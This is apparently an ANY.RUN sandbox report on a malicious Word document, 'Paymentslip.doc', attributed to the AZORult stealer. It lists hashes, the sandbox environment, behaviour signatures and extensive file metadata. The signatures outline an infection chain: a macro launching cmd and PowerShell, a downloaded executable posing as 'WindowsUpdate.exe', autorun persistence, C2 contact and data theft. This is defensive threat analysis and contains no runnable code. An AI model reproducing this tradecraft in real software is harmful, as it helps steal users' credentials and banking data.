Malware analysis Paymentslip.doc Malicious activity | ANY.RUN

Add for printing

File name:	Paymentslip.doc
Full analysis:	https://app.any.run/tasks/819730f4-5b70-4857-a057-48d2c55f3b33
Verdict:	Malicious activity
Threats:	AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	December 06, 2018, 01:09:19
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	opendir loader trojan rat azorult
Indicators:
MIME:	text/xml
File info:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:	BB8C9DB2445E7ECC4E4EEFC6ED1CB418
SHA1:	A5E390676EE75888494C3150ED913BF70882E9C6
SHA256:	FD24DE4D53E61EB7CD0C7B7B99552361DB2024B456568CB14ACCD6F59ADC3363
SSDEEP:	6144:+M516FgSNHUfWFqupSBUKTrOwl0hsXUEM9y:z6FgZWB0nOwl0hsXUEuy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (68.0.3440.106)
Google Update Helper (1.3.33.17)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Starts CMD.EXE for commands execution
  - WINWORD.EXE (PID: 3464)
- Unusual execution from Microsoft Office
  - WINWORD.EXE (PID: 3464)
- Executes PowerShell scripts
  - cmd.exe (PID: 2580)
- Application was dropped or rewritten from another process
  - WindowsUpdate.exe (PID: 2396)
  - WindowsUpdate.exe (PID: 3616)
  - WindowsUpdate.exe (PID: 3864)
  - WindowsUpdate.exe (PID: 3728)
- Downloads executable files from the Internet
  - powershell.exe (PID: 3104)
- Changes the autorun value in the registry
  - WindowsUpdate.exe (PID: 2396)
  - WindowsUpdate.exe (PID: 3616)
- Connects to CnC server
  - WindowsUpdate.exe (PID: 3864)
- AZORULT was detected
  - WindowsUpdate.exe (PID: 3864)
- Actions looks like stealing of personal data
  - WindowsUpdate.exe (PID: 3864)
- Loads dropped or rewritten executable
  - WindowsUpdate.exe (PID: 3864)
SUSPICIOUS
- Creates files in the user directory
  - powershell.exe (PID: 3104)
  - WindowsUpdate.exe (PID: 3864)
- Application launched itself
  - WindowsUpdate.exe (PID: 2396)
  - WindowsUpdate.exe (PID: 3616)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 3104)
  - WindowsUpdate.exe (PID: 2396)
  - WindowsUpdate.exe (PID: 3616)
  - WindowsUpdate.exe (PID: 3864)
INFO
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 3464)
- Creates files in the user directory
  - WINWORD.EXE (PID: 3464)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.xml	\|	Microsoft Office XML Flat File Format Word Document (ASCII) (43.7)
.rels	\|	Open Office XML Relationships (28.2)
.xml	\|	Microsoft Office XML Flat File Format (ASCII) (20.8)
.svg	\|	Scalable Vector Graphics (var.3) (4.5)
.xml	\|	Generic XML (ASCII) (1.5)

EXIF

XMP

PackagePartName:	/_rels/.rels
PackagePartContentType:	application/vnd.openxmlformats-package.relationships+xml
PackagePartPadding:	512
PackagePartXmlDataRelationshipsXmlns:	http://schemas.openxmlformats.org/package/2006/relationships
PackagePartXmlDataRelationshipsRelationshipId:	rId3
PackagePartXmlDataRelationshipsRelationshipType:	http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties
PackagePartXmlDataRelationshipsRelationshipTarget:	docProps/app.xml
PackagePartXmlDataDocumentIgnorable:	w14 w15 wp14
PackagePartXmlDataDocumentBodyPRsidR:	002C3C24
PackagePartXmlDataDocumentBodyPRsidRDefault:	007D1537
PackagePartXmlDataDocumentBodyPBookmarkStartId:	-
PackagePartXmlDataDocumentBodyPBookmarkStartName:	_GoBack
PackagePartXmlDataDocumentBodyPBookmarkEndId:	-
PackagePartXmlDataDocumentBodyPRRPrNoProof:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistT:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistB:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistL:	114300
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistR:	114300
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePos:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorRelativeHeight:	251658240
PackagePartXmlDataDocumentBodyPRDrawingAnchorBehindDoc:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorLocked:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorLayoutInCell:	1
PackagePartXmlDataDocumentBodyPRDrawingAnchorAllowOverlap:	1
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosX:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosY:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHRelativeFrom:	column
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHPosOffset:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVRelativeFrom:	paragraph
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVPosOffset:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCx:	4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCy:	4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentL:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentT:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentR:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentB:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorWrapNone:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrId:	2
PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrName:	Picture 2
PackagePartXmlDataDocumentBodyPRDrawingAnchorCNvGraphicFramePr:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataUri:	http://schemas.openxmlformats.org/drawingml/2006/picture
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrId:	2
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrName:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPicPr:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipEmbed:	rId5
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUri:	{28A0092B-C50C-407E-A947-70E740481C1C}
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillStretchFillRect:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffX:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffY:	-
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCx:	4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCy:	4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomPrst:	rect
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomAvLst:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDistT:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDistB:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDistL:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDistR:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCx:	4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCy:	4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentL:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentT:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentR:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentB:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrId:	1
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrName:	Picture 1
PackagePartXmlDataDocumentBodyPRDrawingInlineCNvGraphicFramePr:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataUri:	http://schemas.openxmlformats.org/drawingml/2006/picture
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrId:	1
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrName:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPicPr:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipEmbed:	rId5
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUri:	{28A0092B-C50C-407E-A947-70E740481C1C}
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillStretchFillRect:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffX:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffY:	-
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCx:	4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCy:	4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomPrst:	rect
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomAvLst:	-
PackagePartXmlDataDocumentBodySectPrRsidR:	002C3C24
PackagePartXmlDataDocumentBodySectPrPgSzW:	12240
PackagePartXmlDataDocumentBodySectPrPgSzH:	15840
PackagePartXmlDataDocumentBodySectPrPgMarTop:	1440
PackagePartXmlDataDocumentBodySectPrPgMarRight:	1440
PackagePartXmlDataDocumentBodySectPrPgMarBottom:	1440
PackagePartXmlDataDocumentBodySectPrPgMarLeft:	1440
PackagePartXmlDataDocumentBodySectPrPgMarHeader:	720
PackagePartXmlDataDocumentBodySectPrPgMarFooter:	720
PackagePartXmlDataDocumentBodySectPrPgMarGutter:	-
PackagePartXmlDataDocumentBodySectPrColsSpace:	720
PackagePartXmlDataDocumentBodySectPrDocGridLinePitch:	360
PackagePartBinaryData:	(Binary data 130316 bytes, use -b option to extract)
PackagePartCompression:	store
PackagePartXmlDataThemeName:	Office Theme
PackagePartXmlDataThemeThemeElementsClrSchemeName:	Office
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal:	windowText
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr:	000000
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal:	window
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr:	FFFFFF
PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal:	44546A
PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal:	E7E6E6
PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal:	5B9BD5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal:	ED7D31
PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal:	A5A5A5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal:	FFC000
PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal:	4472C4
PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal:	70AD47
PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal:	0563C1
PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal:	954F72
PackagePartXmlDataThemeThemeElementsFontSchemeName:	Office
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface:	Calibri Light
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose:	020F0302020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface:	-
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface:	-
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript:	Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface:	ＭＳゴシック
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface:	Calibri
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose:	020F0502020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface:	-
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface:	-
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript:	Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface:	ＭＳ明朝
PackagePartXmlDataThemeThemeElementsFmtSchemeName:	Office
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape:	1
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal:	110000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal:	105000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal:	67000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng:	5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal:	100000
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW:	6350
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap:	flat
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd:	sng
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn:	ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal:	solid
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim:	800000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad:	57150
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist:	19050
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir:	5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn:	ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal:	000000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal:	63000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal:	95000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal:	170000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape:	1
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos:	-
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal:	phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal:	93000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal:	150000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal:	98000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal:	102000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng:	5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled:	-
PackagePartXmlDataThemeObjectDefaults:	-
PackagePartXmlDataThemeExtraClrSchemeLst:	-
PackagePartXmlDataThemeExtLstExtUri:	{05A4C25C-085E-4340-85A3-A5531E510DB2}
PackagePartXmlDataThemeExtLstExtThemeFamilyName:	Office Theme
PackagePartXmlDataThemeExtLstExtThemeFamilyId:	{62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}
PackagePartXmlDataThemeExtLstExtThemeFamilyVid:	{4A3C46E8-61CC-4603-A589-7422A47A8E4A}
PackagePartXmlDataVbaSuppDataIgnorable:	w14 w15 wp14
PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen:	-
PackagePartXmlDataVbaSuppDataMcdsMcdMacroName:	PROJECT.KDDMFC.F_GRZSRQ5L9VLDBWYSHE
PackagePartXmlDataVbaSuppDataMcdsMcdName:	Project.KddmFc.f_GrZsRq5L9VLDbWySHE
PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt:	00
PackagePartXmlDataVbaSuppDataMcdsMcdCmg:	56
PackagePartXmlDataSettingsIgnorable:	w14 w15
PackagePartXmlDataSettingsZoomPercent:	100
PackagePartXmlDataSettingsDefaultTabStopVal:	720
PackagePartXmlDataSettingsCharacterSpacingControlVal:	doNotCompress
PackagePartXmlDataSettingsCompatCompatSettingName:	compatibilityMode
PackagePartXmlDataSettingsCompatCompatSettingUri:	http://schemas.microsoft.com/office/word
PackagePartXmlDataSettingsCompatCompatSettingVal:	15
PackagePartXmlDataSettingsRsidsRsidRootVal:	007D1537
PackagePartXmlDataSettingsRsidsRsidVal:	002C3C24
PackagePartXmlDataSettingsMathPrMathFontVal:	Cambria Math
PackagePartXmlDataSettingsMathPrBrkBinVal:	before
PackagePartXmlDataSettingsMathPrBrkBinSubVal:	--
PackagePartXmlDataSettingsMathPrSmallFracVal:	-
PackagePartXmlDataSettingsMathPrDispDef:	-
PackagePartXmlDataSettingsMathPrLMarginVal:	-
PackagePartXmlDataSettingsMathPrRMarginVal:	-
PackagePartXmlDataSettingsMathPrDefJcVal:	centerGroup
PackagePartXmlDataSettingsMathPrWrapIndentVal:	1440
PackagePartXmlDataSettingsMathPrIntLimVal:	subSup
PackagePartXmlDataSettingsMathPrNaryLimVal:	undOvr
PackagePartXmlDataSettingsThemeFontLangVal:	en-US
PackagePartXmlDataSettingsClrSchemeMappingBg1:	light1
PackagePartXmlDataSettingsClrSchemeMappingT1:	dark1
PackagePartXmlDataSettingsClrSchemeMappingBg2:	light2
PackagePartXmlDataSettingsClrSchemeMappingT2:	dark2
PackagePartXmlDataSettingsClrSchemeMappingAccent1:	accent1
PackagePartXmlDataSettingsClrSchemeMappingAccent2:	accent2
PackagePartXmlDataSettingsClrSchemeMappingAccent3:	accent3
PackagePartXmlDataSettingsClrSchemeMappingAccent4:	accent4
PackagePartXmlDataSettingsClrSchemeMappingAccent5:	accent5
PackagePartXmlDataSettingsClrSchemeMappingAccent6:	accent6
PackagePartXmlDataSettingsClrSchemeMappingHyperlink:	hyperlink
PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink:	followedHyperlink
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt:	edit
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax:	1026
PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt:	edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt:	edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData:	1
PackagePartXmlDataSettingsDecimalSymbolVal:	.
PackagePartXmlDataSettingsListSeparatorVal:	,
PackagePartXmlDataSettingsChartTrackingRefBased:	-
PackagePartXmlDataSettingsDocIdVal:	{587BFEAE-043A-4C54-8D39-E3BC2D30D35D}
PackagePartXmlDataPropertiesXmlns:	http://schemas.openxmlformats.org/officeDocument/2006/extended-properties
PackagePartXmlDataPropertiesTemplate:	Normal
PackagePartXmlDataPropertiesTotalTime:	-
PackagePartXmlDataPropertiesPages:	1
PackagePartXmlDataPropertiesWords:	-
PackagePartXmlDataPropertiesCharacters:	2
PackagePartXmlDataPropertiesApplication:	Microsoft Office Word
PackagePartXmlDataPropertiesDocSecurity:	-
PackagePartXmlDataPropertiesLines:	1
PackagePartXmlDataPropertiesParagraphs:	1
PackagePartXmlDataPropertiesScaleCrop:	-
PackagePartXmlDataPropertiesCompany:	-
PackagePartXmlDataPropertiesLinksUpToDate:	-
PackagePartXmlDataPropertiesCharactersWithSpaces:	2
PackagePartXmlDataPropertiesSharedDoc:	-
PackagePartXmlDataPropertiesHyperlinksChanged:	-
PackagePartXmlDataPropertiesAppVersion:	15
PackagePartXmlDataStylesIgnorable:	w14 w15
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme:	minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme:	minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme:	minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme:	minorBidi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal:	22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal:	22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal:	en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia:	en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi:	ar-SA
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter:	160
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine:	259
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule:	auto
PackagePartXmlDataStylesLatentStylesDefLockedState:	-
PackagePartXmlDataStylesLatentStylesDefUIPriority:	99
PackagePartXmlDataStylesLatentStylesDefSemiHidden:	-
PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed:	-
PackagePartXmlDataStylesLatentStylesDefQFormat:	-
PackagePartXmlDataStylesLatentStylesCount:	371
PackagePartXmlDataStylesLatentStylesLsdExceptionName:	Normal
PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority:	-
PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat:	1
PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden:	1
PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed:	1
PackagePartXmlDataStylesStyleType:	paragraph
PackagePartXmlDataStylesStyleDefault:	1
PackagePartXmlDataStylesStyleStyleId:	Normal
PackagePartXmlDataStylesStyleNameVal:	Normal
PackagePartXmlDataStylesStyleQFormat:	-
PackagePartXmlDataStylesStyleUiPriorityVal:	1
PackagePartXmlDataStylesStyleSemiHidden:	-
PackagePartXmlDataStylesStyleUnhideWhenUsed:	-
PackagePartXmlDataStylesStyleTblPrTblIndW:	-
PackagePartXmlDataStylesStyleTblPrTblIndType:	dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarTopW:	-
PackagePartXmlDataStylesStyleTblPrTblCellMarTopType:	dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW:	108
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType:	dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW:	-
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType:	dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarRightW:	108
PackagePartXmlDataStylesStyleTblPrTblCellMarRightType:	dxa
PackagePartXmlDataCorePropertiesTitle:	-
PackagePartXmlDataCorePropertiesSubject:	-
PackagePartXmlDataCorePropertiesCreator:	gtst1
PackagePartXmlDataCorePropertiesKeywords:	-
PackagePartXmlDataCorePropertiesDescription:	-
PackagePartXmlDataCorePropertiesLastModifiedBy:	gtst1
PackagePartXmlDataCorePropertiesRevision:	1
PackagePartXmlDataCorePropertiesCreatedType:	dcterms:W3CDTF
PackagePartXmlDataCorePropertiesCreated:	2018:12:04 06:17:00Z
PackagePartXmlDataCorePropertiesModifiedType:	dcterms:W3CDTF
PackagePartXmlDataCorePropertiesModified:	2018:12:04 06:17:00Z
PackagePartXmlDataFontsIgnorable:	w14 w15
PackagePartXmlDataFontsFontName:	Calibri
PackagePartXmlDataFontsFontPanose1Val:	020F0502020204030204
PackagePartXmlDataFontsFontCharsetVal:	00
PackagePartXmlDataFontsFontFamilyVal:	swiss
PackagePartXmlDataFontsFontPitchVal:	variable
PackagePartXmlDataFontsFontSigUsb0:	E00002FF
